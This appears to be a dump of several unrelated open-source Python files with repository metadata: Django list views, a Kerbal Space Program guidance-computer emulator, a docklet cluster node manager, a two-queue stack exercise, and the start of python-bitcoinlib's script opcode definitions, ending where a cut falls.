table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class PartOfQuoteListView(GenericListView):
model = PartOfQuote
table_class = PartOfQuoteTable
filter_class = PartOfQuoteListFilter
formhelper_class = PartOfQuoteFilterFormHelper
init_columns = ['text', 'part_of', 'source', 'speaker', 'language']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(PartOfQuoteListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class QuoteListView(GenericListView):
model = Quote
table_class = QuoteTable
filter_class = QuoteListFilter
formhelper_class = QuoteFilterFormHelper
init_columns = ['text', 'book_source', 'zitatsprache']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(QuoteListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class WorkListView(GenericListView):
model = Work
table_class = WorkTable
filter_class = WorkListFilter
formhelper_class = WorkFilterFormHelper
init_columns = ['title', 'veroeffentlicht', 'author', 'main_language', 'creation_start_date']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(WorkListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class BookListView(GenericListView):
model = Book
table_class = BookTable
filter_class = BookListFilter
formhelper_class = BookFilterFormHelper
init_columns = ['title', 'bookauthor', 'publication_year']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(BookListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class PersonListView(GenericListView):
model = Person
table_class = PersonTable
filter_class = PersonListFilter
formhelper_class = PersonFilterFormHelper
init_columns = ['first_name', 'last_name', 'person_gnd']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(PersonListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class SpeakerListView(GenericListView):
model = Speaker
table_class = SpeakerTable
filter_class = SpeakerListFilter
formhelper_class = SpeakerFilterFormHelper
init_columns = ['name', 'definition', 'alt_name', 'related_works']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(SpeakerListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
| mit | -3,883,044,588,713,250,000 | 38.437318 | 97 | 0.64922 | false |
mwhagedorn/basaGC | basagc/computer.py | 1 | 11894 | #!/usr/bin/env python2
# -*- coding: UTF-8 -*-
"""This file contains the guts of the guidance computer"""
# This file is part of basaGC (https://github.com/cashelcomputers/basaGC),
# copyright 2014 Tim Buchanan, cashelcomputers (at) gmail.com
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
# Includes code and images from the Virtual AGC Project
# (http://www.ibiblio.org/apollo/index.html) by Ronald S. Burkey
# <[email protected]>
import wx
import burn
import config
import utils
import dsky
import verbs
import nouns
import programs
from telemachus import check_connection, get_telemetry
import telemachus
class Computer(object):
""" This object models the core of the guidance computer.
"""
def __init__(self, gui):
""" Class constructor.
:param gui: the wxPython frame object
:return: None
"""
utils.log(message="\n\n" + config.SHORT_LICENCE + "\n", log_level="INFO")
self.gui = gui
self.dsky = dsky.DSKY(self.gui, self)
self.loop_timer = wx.Timer(gui)
gui.Bind(wx.EVT_TIMER, self.main_loop, self.loop_timer)
self.is_powered_on = False
self.main_loop_table = []
self.gui.Bind(wx.EVT_CLOSE, self.quit)
self.alarm_codes = [0, 0, 0]
self.running_program = None
self.noun_data = {
"30": [],
}
self.next_burn = None
self._burn_queue = []
self.is_ksp_connected = None
self.ksp_paused_state = None
self.is_direction_autopilot_engaged = False
self.is_thrust_autopilot_engaged = False
self.moi_burn_delta_v = 0.0 # a bit of a hack, need to rethink this
burn.gc = self
telemachus.gc = self
verbs.gc = self
verbs.dsky = self.dsky
verbs.frame = self.gui
nouns.gc = self
nouns.dsky = self.dsky
nouns.frame = self.gui
programs.gc = self
programs.dsky = self.dsky
self.nouns = nouns.nouns
self.verbs = verbs.verbs
self.programs = programs.programs
self.option_codes = {
"00001": "",
"00002": "",
"00003": "",
"00004": "",
"00007": "",
"00024": "",
}
self.on()
def add_burn_to_queue(self, burn_object, execute=True):
""" Adds a Burn object to the computer burn queue. If no burn is assigned to next_burn, load new burn to
next_burn
:param burn_object: a Burn object that contains parameters for the burn
:param execute: if true, execute the added burn
:return: None
"""
self._burn_queue.append(burn_object)
if not self.next_burn:
self.next_burn = self._burn_queue.pop()
if execute:
self.next_burn.execute()
def remove_burn(self, this_burn):
""" Removes a given Burn object from the computers burn queue
:param this_burn: the Burn object to remove
:return: None
"""
if this_burn == self.next_burn:
self.next_burn = None
if this_burn in self._burn_queue:
self._burn_queue.remove(this_burn)
def burn_complete(self):
""" Removes a completed burn and loads next queued burn if available.
:return: None
"""
utils.log("Removing {} from burn queue".format(self.next_burn))
self.next_burn = None
if self._burn_queue:
utils.log("Adding {} as next burn".format(self._burn_queue[0]))
self.next_burn = self._burn_queue.pop()
def disable_direction_autopilot(self):
""" Disables the directional autopilot
:return: None
"""
telemachus.disable_smartass()
self.is_direction_autopilot_engaged = False
utils.log("Autopilot disabled", log_level="INFO")
def quit(self, event=None):
""" Quits basaGC.
:param event: wxPython event (not used)
:return: None
"""
# disables SMARTASS
try:
telemachus.disable_smartass()
except TypeError:
pass
# if self.loop_timer.is_running:
# self.loop_timer.stop()
self.gui.Destroy()
def on(self):
""" Turns the guidance computer on.
:return: None
"""
utils.log("Computer booting...", log_level="INFO")
# attempt to load telemetry listing
try:
telemachus.telemetry = telemachus.get_api_listing()
except telemachus.KSPNotConnected:
utils.log("Cannot retrieve telemetry listing - no connection to KSP", log_level="WARNING")
self.dsky.annunciators["no_att"].on()
else:
utils.log("Retrieved telemetry listing", log_level="INFO")
self.loop_timer.Start(config.LOOP_TIMER_INTERVAL)
self.is_powered_on = True
for display_item in self.dsky.static_display:
display_item.on()
def main_loop(self, event):
""" The guidance computer main loop.
:return: None
"""
# Check if we have a connection to KSP
self.check_ksp_connection()
# check KSP paused state
self.check_paused_state()
# if self.run_average_g_routine:
# routines.average_g()
for item in self.main_loop_table:
item()
def go_to_poo(self):
""" Executes program 00. Name comes from NASA documentation :)
:return: None
"""
poo = self.programs["00"]()
poo.execute()
def execute_verb(self, verb, noun=None, **kwargs):
""" Executes the specified verb, optionally with the specified noun.
:param verb: The verb to execute
:param noun: The noun to supply to the verb
:return: None
"""
if noun is not None:
self.dsky.set_noun(noun)
verb = str(verb)
noun = str(noun)
self.dsky.control_registers["verb"].display(verb)
if int(verb) < 40:
verb_to_execute = self.verbs[verb](noun)
else:
verb_to_execute = self.verbs[verb]()
verb_to_execute.execute(**kwargs)
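    # A minimal usage sketch (instance name and verb/noun pair are illustrative
    # only):
    #   computer.execute_verb(verb=16, noun="36")
    # displays verb 16 on the DSKY and runs it against noun 36.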
def reset_alarm_codes(self):
""" Resets the alarm codes.
:return: None
"""
self.alarm_codes[2] = self.alarm_codes[0]
self.alarm_codes[0] = 0
self.alarm_codes[1] = 0
def program_alarm(self, alarm_code):
""" Sets the program alarm codes in memory and turns the PROG annunciator on.
:param alarm_code: a 3 or 4 digit octal int of the alarm code to raise
:return: None
"""
utils.log("PROGRAM ALARM {}: {}".format(str(alarm_code), config.ALARM_CODES[alarm_code]), log_level="ERROR")
alarm_code += 1000
if self.alarm_codes[0] != 0:
self.alarm_codes[1] = self.alarm_codes[0]
self.alarm_codes[0] = alarm_code
self.alarm_codes[2] = self.alarm_codes[0]
self.dsky.annunciators["prog"].on()
def poodoo_abort(self, alarm_code):
""" Terminates the faulty program, and executes Program 00 (P00)
:param alarm_code: a 3 digit octal int of the alarm code to raise
:return: None
"""
alarm_message = config.ALARM_CODES[alarm_code]
alarm_code += 2000
if self.alarm_codes[0] != 0:
self.alarm_codes[1] = self.alarm_codes[0]
self.alarm_codes[0] = alarm_code
self.alarm_codes[2] = self.alarm_codes[0]
self.dsky.annunciators["prog"].on()
try:
self.running_program[-1].terminate()
except programs.ProgramTerminated:
# this should happen if the program terminated successfully
utils.log("P00DOO ABORT {}: {}".format(str(alarm_code), alarm_message), log_level="ERROR")
poo = self.programs["00"]()
poo.execute()
def program_restart(self, alarm_code, message=None):
""" Triggers a program restart.
:param alarm_code: a 3 or 4 digit octal int of the alarm code to raise
:param message: optional message to print to log
:return: None
"""
# TODO: insert terminate and restart program
utils.log("Program fresh start not implemented yet... watch this space...")
if message:
utils.log(message, log_level="ERROR")
def computer_restart(self, alarm_code, message=None):
""" Triggers a guidance computer hardware restart. The most severe of the errors!
:param alarm_code: a 3 or 4 digit octal int of the alarm code to raise
:param message: optional message to print to log
:return: None
"""
# insert computer reboot
# self.fresh_start()
if message:
utils.log(message, log_level="CRITICAL")
pass
def servicer(self):
""" For future use. The servicer updates the spacecrafts state vector.
"""
pass
def check_ksp_connection(self):
""" checks if we have a connection to Telemachus / KSP
:return: None
"""
if not check_connection():
if self.is_ksp_connected:
# we have just lost the connection, illuminate NO ATT annunciator and log it
self.dsky.annunciators["no_att"].on()
utils.log("No connection to KSP, navigation functions unavailable", log_level="ERROR")
self.is_ksp_connected = False
else:
if not self.is_ksp_connected:
# have just regained connection, deluminate NO ATT annunciator and log it
self.dsky.annunciators["no_att"].off()
utils.log("Connection to KSP established", log_level="INFO")
self.is_ksp_connected = True
if not telemachus.telemetry:
telemachus.get_api_listing()
def check_paused_state(self):
""" Checks the paused state of KSP, and illuminates STBY annunciator and logs state as necessary.
:return: None
"""
if self.is_ksp_connected:
paused_state = get_telemetry("paused")
# if the paused state hasn't changed, skip any annunciator changes
if paused_state != self.ksp_paused_state:
if paused_state == 0:
self.dsky.annunciators["stby"].off()
utils.log("KSP unpaused, all systems go", log_level="INFO")
elif paused_state == 1:
self.dsky.annunciators["stby"].on()
utils.log("KSP paused", log_level="INFO")
elif paused_state == 2:
self.dsky.annunciators["stby"].on()
utils.log("No power to Telemachus antenna", log_level="WARNING")
elif paused_state == 3:
self.dsky.annunciators["stby"].on()
utils.log("Telemachus antenna off", log_level="WARNING")
elif paused_state == 4:
self.dsky.annunciators["stby"].on()
utils.log("No Telemachus antenna found", log_level="WARNING")
self.ksp_paused_state = paused_state
| gpl-2.0 | 8,683,317,448,400,047,000 | 32.223464 | 116 | 0.583656 | false |
scorpionis/docklet | src/nodemgr.py | 1 | 6883 | #!/usr/bin/python3
import threading, random, time, xmlrpc.client, sys
#import network
from nettools import netcontrol
from log import logger
import env
##########################################
# NodeMgr
# Description : manage the physical nodes
# 1. list running nodes now
# 2. update node list when new node joins
# ETCD table :
# machines/allnodes -- all nodes in docklet, for recovery
# machines/runnodes -- run nodes of this start up
##############################################
class NodeMgr(object):
def __init__(self, networkmgr, etcdclient, addr, mode):
self.addr = addr
logger.info ("begin initialize on %s" % self.addr)
self.networkmgr = networkmgr
self.etcd = etcdclient
self.mode = mode
self.workerport = env.getenv('WORKER_PORT')
# initialize the network
logger.info ("initialize network")
        # 'docklet-br' does not need an IP address, because every user has a gateway
#[status, result] = self.networkmgr.acquire_sysips_cidr()
#self.networkmgr.printpools()
#if not status:
# logger.info ("initialize network failed, no IP for system bridge")
# sys.exit(1)
#self.bridgeip = result[0]
#logger.info ("initialize bridge wih ip %s" % self.bridgeip)
#network.netsetup("init", self.bridgeip)
if self.mode == 'new':
if netcontrol.bridge_exists('docklet-br'):
netcontrol.del_bridge('docklet-br')
netcontrol.new_bridge('docklet-br')
else:
if not netcontrol.bridge_exists('docklet-br'):
logger.error("docklet-br not found")
sys.exit(1)
# init rpc list
self.rpcs = []
# get allnodes
# used in recovery mode, find alll the lost running nodes
self.allnodes = self._nodelist_etcd("allnodes")
self.runnodes = []
[status, runlist] = self.etcd.listdir("machines/runnodes")
for node in runlist:
nodeip = node['key'].rsplit('/',1)[1]
if node['value'] == 'ok':
logger.info ("running node %s" % nodeip)
self.runnodes.append(nodeip)
self.rpcs.append(xmlrpc.client.ServerProxy("http://%s:%s" % (nodeip, self.workerport)))
logger.info ("add %s:%s in rpc client list" % (nodeip, self.workerport))
logger.info ("all nodes are: %s" % self.allnodes)
logger.info ("run nodes are: %s" % self.runnodes)
# start new thread to watch whether a new node joins
logger.info ("start thread to watch new nodes ...")
self.thread_watchnewnode = threading.Thread(target=self._watchnewnode)
self.thread_watchnewnode.start()
# wait for all nodes joins
while(True):
allin = True
for node in self.allnodes:
if node not in self.runnodes:
allin = False
break
if allin:
logger.info("all nodes necessary joins ...")
break
time.sleep(0.05)
logger.info ("run nodes are: %s" % self.runnodes)
# get nodes list from etcd table
def _nodelist_etcd(self, which):
if which == "allnodes" or which == "runnodes":
[status, nodeinfo]=self.etcd.listdir("machines/"+which)
if status:
nodelist = []
for node in nodeinfo:
nodelist.append(node["key"].rsplit('/', 1)[1])
return nodelist
return []
# thread target : watch whether a new node joins
def _watchnewnode(self):
while(True):
time.sleep(0.1)
[status, runlist] = self.etcd.listdir("machines/runnodes")
if not status:
logger.warning ("get runnodes list failed from etcd ")
continue
for node in runlist:
nodeip = node['key'].rsplit('/',1)[1]
if node['value']=='waiting':
                    # The 'waiting' state could be deleted; there is no need for the master to
                    # check this state because the worker will change it and the master will not.
                    # It is only preserved for compatibility.
logger.info ("%s want to joins, call it to init first" % nodeip)
elif node['value']=='work':
logger.info ("new node %s joins" % nodeip)
# setup GRE tunnels for new nodes
if self.addr == nodeip:
logger.debug ("worker start on master node. not need to setup GRE")
else:
logger.debug ("setup GRE for %s" % nodeip)
if netcontrol.gre_exists('docklet-br', nodeip):
logger.debug("GRE for %s already exists, reuse it" % nodeip)
else:
netcontrol.setup_gre('docklet-br', nodeip)
self.etcd.setkey("machines/runnodes/"+nodeip, "ok")
if nodeip not in self.runnodes:
self.runnodes.append(nodeip)
# node not in all node list is a new node.
if nodeip not in self.allnodes:
self.allnodes.append(nodeip)
self.etcd.setkey("machines/allnodes/"+nodeip, "ok")
logger.debug ("all nodes are: %s" % self.allnodes)
logger.debug ("run nodes are: %s" % self.runnodes)
self.rpcs.append(xmlrpc.client.ServerProxy("http://%s:%s"
% (nodeip, self.workerport)))
logger.info ("add %s:%s in rpc client list" %
(nodeip, self.workerport))
# add machine to the scheduler
import dscheduler
[status,total_cpus] = self.etcd.getkey("cpus/"+nodeip)
[status,total_mems] = self.etcd.getkey("mems/"+nodeip)
logger.info("add machine %s to scheduler, cpus: %s, mems: %s",nodeip, total_cpus, total_mems)
dscheduler.add_machine(nodeip,total_cpus,total_mems)
# get all run nodes' IP addr
def get_nodeips(self):
return self.allnodes
def get_rpcs(self):
return self.rpcs
def get_onerpc(self):
return self.rpcs[random.randint(0, len(self.rpcs)-1)]
def rpc_to_ip(self, rpcclient):
return self.runnodes[self.rpcs.index(rpcclient)]
def ip_to_rpc(self, nodeip):
return self.rpcs[self.runnodes.index(nodeip)]
def get_allnodes(self):
return self.allnodes
| bsd-3-clause | -1,103,196,115,511,232,800 | 41.487654 | 117 | 0.527241 | false |
jasonleaster/Algorithm | Stack/Python_version/stack_by_two_queue.py | 1 | 1379 | class Stack():
    def __init__(self, arg=None):
        # avoid the shared mutable default argument pitfall
        self.Q1 = arg if arg is not None else []
self.Q2 = []
def stack_empty(self):
if len(self.Q1) == 0 and len(self.Q2) == 0:
return True
else:
return False
def push(self, x):
if self.stack_empty() is True:
self.Q1.append(x)
elif len(self.Q1) != 0:
self.Q1.append(x)
else:
self.Q2.append(x)
def pop(self):
val = None
if self.stack_empty() == True:
print "underflow"
elif len(self.Q1) != 0:
while len(self.Q1) != 0:
if len(self.Q1) == 1:
val = self.Q1[0]
else:
self.Q2.append(self.Q1[0])
self.Q1.remove(self.Q1[0])
else:
while len(self.Q2) != 0:
if len(self.Q2) == 1:
val = self.Q2[0]
else:
self.Q1.append(self.Q2[0])
self.Q2.remove(self.Q2[0])
return val
def show_stack(self):
print "Queue 1 :", self.Q1
print "Queue 2 :", self.Q2
#-----------------------
input_num = ['a', 'b', 'c']
stk = Stack(input_num)
stk.pop()
stk.show_stack()
stk.pop()
stk.show_stack()
stk.push('d')
stk.show_stack()
stk.pop()
stk.show_stack()
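# Expected output of the demo above (an illustrative trace of the two
# internal queues after each call):
#   Queue 1 : []          Queue 2 : ['a', 'b']    after pop()  -> 'c'
#   Queue 1 : ['a']       Queue 2 : []            after pop()  -> 'b'
#   Queue 1 : ['a', 'd']  Queue 2 : []            after push('d')
#   Queue 1 : []          Queue 2 : ['a']         after pop()  -> 'd'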
| gpl-2.0 | 7,906,497,586,329,862,000 | 20.546875 | 51 | 0.423495 | false |
petertodd/replace-by-fee-tools | lib/python-bitcoinlib/bitcoin/core/script.py | 1 | 34644 | # Copyright (C) 2012-2015 The python-bitcoinlib developers
#
# This file is part of python-bitcoinlib.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of python-bitcoinlib, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
"""Scripts
Functionality to build scripts, as well as SignatureHash(). Script evaluation
is in bitcoin.core.scripteval
"""
from __future__ import absolute_import, division, print_function
import sys
_bchr = chr
_bord = ord
if sys.version > '3':
long = int
_bchr = lambda x: bytes([x])
_bord = lambda x: x
from io import BytesIO as _BytesIO
else:
from cStringIO import StringIO as _BytesIO
import struct
import bitcoin.core
import bitcoin.core._bignum
from .serialize import *
MAX_SCRIPT_SIZE = 10000
MAX_SCRIPT_ELEMENT_SIZE = 520
MAX_SCRIPT_OPCODES = 201
OPCODE_NAMES = {}
_opcode_instances = []
class CScriptOp(int):
"""A single script opcode"""
__slots__ = []
@staticmethod
def encode_op_pushdata(d):
"""Encode a PUSHDATA op, returning bytes"""
if len(d) < 0x4c:
return b'' + _bchr(len(d)) + d # OP_PUSHDATA
elif len(d) <= 0xff:
return b'\x4c' + _bchr(len(d)) + d # OP_PUSHDATA1
elif len(d) <= 0xffff:
return b'\x4d' + struct.pack(b'<H', len(d)) + d # OP_PUSHDATA2
elif len(d) <= 0xffffffff:
return b'\x4e' + struct.pack(b'<I', len(d)) + d # OP_PUSHDATA4
else:
raise ValueError("Data too long to encode in a PUSHDATA op")
@staticmethod
def encode_op_n(n):
"""Encode a small integer op, returning an opcode"""
if not (0 <= n <= 16):
raise ValueError('Integer must be in range 0 <= n <= 16, got %d' % n)
if n == 0:
return OP_0
else:
return CScriptOp(OP_1 + n-1)
def decode_op_n(self):
"""Decode a small integer opcode, returning an integer"""
if self == OP_0:
return 0
if not (self == OP_0 or OP_1 <= self <= OP_16):
raise ValueError('op %r is not an OP_N' % self)
return int(self - OP_1+1)
def is_small_int(self):
"""Return true if the op pushes a small integer to the stack"""
if 0x51 <= self <= 0x60 or self == 0:
return True
else:
return False
def __str__(self):
return repr(self)
def __repr__(self):
if self in OPCODE_NAMES:
return OPCODE_NAMES[self]
else:
return 'CScriptOp(0x%x)' % self
def __new__(cls, n):
try:
return _opcode_instances[n]
except IndexError:
assert len(_opcode_instances) == n
_opcode_instances.append(super(CScriptOp, cls).__new__(cls, n))
return _opcode_instances[n]
# Populate opcode instance table
for n in range(0xff+1):
CScriptOp(n)
# push value
OP_0 = CScriptOp(0x00)
OP_FALSE = OP_0
OP_PUSHDATA1 = CScriptOp(0x4c)
OP_PUSHDATA2 = CScriptOp(0x4d)
OP_PUSHDATA4 = CScriptOp(0x4e)
OP_1NEGATE = CScriptOp(0x4f)
OP_RESERVED = CScriptOp(0x50)
OP_1 = CScriptOp(0x51)
OP_TRUE = OP_1
OP_2 = CScriptOp(0x52)
OP_3 = CScriptOp(0x53)
OP_4 = CScriptOp(0x54)
OP_5 = CScriptOp(0x55)
OP_6 = CScriptOp(0x56)
OP_7 = CScriptOp(0x57)
OP_8 = CScriptOp(0x58)
OP_9 = CScriptOp(0x59)
OP_10 = CScriptOp(0x5a)
OP_11 = CScriptOp(0x5b)
OP_12 = CScriptOp(0x5c)
OP_13 = CScriptOp(0x5d)
OP_14 = CScriptOp(0x5e)
OP_15 = CScriptOp(0x5f)
OP_16 = CScriptOp(0x60)
# control
OP_NOP = CScriptOp(0x61)
OP_VER = CScriptOp(0x62)
OP_IF = CScriptOp(0x63)
OP_NOTIF = CScriptOp(0x64)
OP_VERIF = CScriptOp(0x65)
OP_VERNOTIF = CScriptOp(0x66)
OP_ELSE = CScriptOp(0x67)
OP_ENDIF = CScriptOp(0x68)
OP_VERIFY = CScriptOp(0x69)
OP_RETURN = CScriptOp(0x6a)
# stack ops
OP_TOALTSTACK = CScriptOp(0x6b)
OP_FROMALTSTACK = CScriptOp(0x6c)
OP_2DROP = CScriptOp(0x6d)
OP_2DUP = CScriptOp(0x6e)
OP_3DUP = CScriptOp(0x6f)
OP_2OVER = CScriptOp(0x70)
OP_2ROT = CScriptOp(0x71)
OP_2SWAP = CScriptOp(0x72)
OP_IFDUP = CScriptOp(0x73)
OP_DEPTH = CScriptOp(0x74)
OP_DROP = CScriptOp(0x75)
OP_DUP = CScriptOp(0x76)
OP_NIP = CScriptOp(0x77)
OP_OVER = CScriptOp(0x78)
OP_PICK = CScriptOp(0x79)
OP_ROLL = CScriptOp(0x7a)
OP_ROT = CScriptOp(0x7b)
OP_SWAP = CScriptOp(0x7c)
OP_TUCK = CScriptOp(0x7d)
# splice ops
OP_CAT = CScriptOp(0x7e)
OP_SUBSTR = CScriptOp(0x7f)
OP_LEFT = CScriptOp(0x80)
OP_RIGHT = CScriptOp(0x81)
OP_SIZE = CScriptOp(0x82)
# bit logic
OP_INVERT = CScriptOp(0x83)
OP_AND = CScriptOp(0x84)
OP_OR = CScriptOp(0x85)
OP_XOR = CScriptOp(0x86)
OP_EQUAL = CScriptOp(0x87)
OP_EQUALVERIFY = CScriptOp(0x88)
OP_RESERVED1 = CScriptOp(0x89)
OP_RESERVED2 = CScriptOp(0x8a)
# numeric
OP_1ADD = CScriptOp(0x8b)
OP_1SUB = CScriptOp(0x8c)
OP_2MUL = CScriptOp(0x8d)
OP_2DIV = CScriptOp(0x8e)
OP_NEGATE = CScriptOp(0x8f)
OP_ABS = CScriptOp(0x90)
OP_NOT = CScriptOp(0x91)
OP_0NOTEQUAL = CScriptOp(0x92)
OP_ADD = CScriptOp(0x93)
OP_SUB = CScriptOp(0x94)
OP_MUL = CScriptOp(0x95)
OP_DIV = CScriptOp(0x96)
OP_MOD = CScriptOp(0x97)
OP_LSHIFT = CScriptOp(0x98)
OP_RSHIFT = CScriptOp(0x99)
OP_BOOLAND = CScriptOp(0x9a)
OP_BOOLOR = CScriptOp(0x9b)
OP_NUMEQUAL = CScriptOp(0x9c)
OP_NUMEQUALVERIFY = CScriptOp(0x9d)
OP_NUMNOTEQUAL = CScriptOp(0x9e)
OP_LESSTHAN = CScriptOp(0x9f)
OP_GREATERTHAN = CScriptOp(0xa0)
OP_LESSTHANOREQUAL = CScriptOp(0xa1)
OP_GREATERTHANOREQUAL = CScriptOp(0xa2)
OP_MIN = CScriptOp(0xa3)
OP_MAX = CScriptOp(0xa4)
OP_WITHIN = CScriptOp(0xa5)
# crypto
OP_RIPEMD160 = CScriptOp(0xa6)
OP_SHA1 = CScriptOp(0xa7)
OP_SHA256 = CScriptOp(0xa8)
OP_HASH160 = CScriptOp(0xa9)
OP_HASH256 = CScriptOp(0xaa)
OP_CODESEPARATOR = CScriptOp(0xab)
OP_CHECKSIG = CScriptOp(0xac)
OP_CHECKSIGVERIFY = CScriptOp(0xad)
OP_CHECKMULTISIG = CScriptOp(0xae)
OP_CHECKMULTISIGVERIFY = CScriptOp(0xaf)
# expansion
OP_NOP1 = CScriptOp(0xb0)
OP_NOP2 = CScriptOp(0xb1)
OP_CHECKLOCKTIMEVERIFY = OP_NOP2
OP_NOP3 = CScriptOp(0xb2)
OP_NOP4 = CScriptOp(0xb3)
OP_NOP5 = CScriptOp(0xb4)
OP_NOP6 = CScriptOp(0xb5)
OP_NOP7 = CScriptOp(0xb6)
OP_NOP8 = CScriptOp(0xb7)
OP_NOP9 = CScriptOp(0xb8)
OP_NOP10 = CScriptOp(0xb9)
# template matching params
OP_SMALLINTEGER = CScriptOp(0xfa)
OP_PUBKEYS = CScriptOp(0xfb)
OP_PUBKEYHASH = CScriptOp(0xfd)
OP_PUBKEY = CScriptOp(0xfe)
OP_INVALIDOPCODE = CScriptOp(0xff)
OPCODE_NAMES.update({
OP_0: 'OP_0',
OP_PUSHDATA1: 'OP_PUSHDATA1',
OP_PUSHDATA2: 'OP_PUSHDATA2',
OP_PUSHDATA4: 'OP_PUSHDATA4',
OP_1NEGATE: 'OP_1NEGATE',
OP_RESERVED: 'OP_RESERVED',
OP_1: 'OP_1',
OP_2: 'OP_2',
OP_3: 'OP_3',
OP_4: 'OP_4',
OP_5: 'OP_5',
OP_6: 'OP_6',
OP_7: 'OP_7',
OP_8: 'OP_8',
OP_9: 'OP_9',
OP_10: 'OP_10',
OP_11: 'OP_11',
OP_12: 'OP_12',
OP_13: 'OP_13',
OP_14: 'OP_14',
OP_15: 'OP_15',
OP_16: 'OP_16',
OP_NOP: 'OP_NOP',
OP_VER: 'OP_VER',
OP_IF: 'OP_IF',
OP_NOTIF: 'OP_NOTIF',
OP_VERIF: 'OP_VERIF',
OP_VERNOTIF: 'OP_VERNOTIF',
OP_ELSE: 'OP_ELSE',
OP_ENDIF: 'OP_ENDIF',
OP_VERIFY: 'OP_VERIFY',
OP_RETURN: 'OP_RETURN',
OP_TOALTSTACK: 'OP_TOALTSTACK',
OP_FROMALTSTACK: 'OP_FROMALTSTACK',
OP_2DROP: 'OP_2DROP',
OP_2DUP: 'OP_2DUP',
OP_3DUP: 'OP_3DUP',
OP_2OVER: 'OP_2OVER',
OP_2ROT: 'OP_2ROT',
OP_2SWAP: 'OP_2SWAP',
OP_IFDUP: 'OP_IFDUP',
OP_DEPTH: 'OP_DEPTH',
OP_DROP: 'OP_DROP',
OP_DUP: 'OP_DUP',
OP_NIP: 'OP_NIP',
OP_OVER: 'OP_OVER',
OP_PICK: 'OP_PICK',
OP_ROLL: 'OP_ROLL',
OP_ROT: 'OP_ROT',
OP_SWAP: 'OP_SWAP',
OP_TUCK: 'OP_TUCK',
OP_CAT: 'OP_CAT',
OP_SUBSTR: 'OP_SUBSTR',
OP_LEFT: 'OP_LEFT',
OP_RIGHT: 'OP_RIGHT',
OP_SIZE: 'OP_SIZE',
OP_INVERT: 'OP_INVERT',
OP_AND: 'OP_AND',
OP_OR: 'OP_OR',
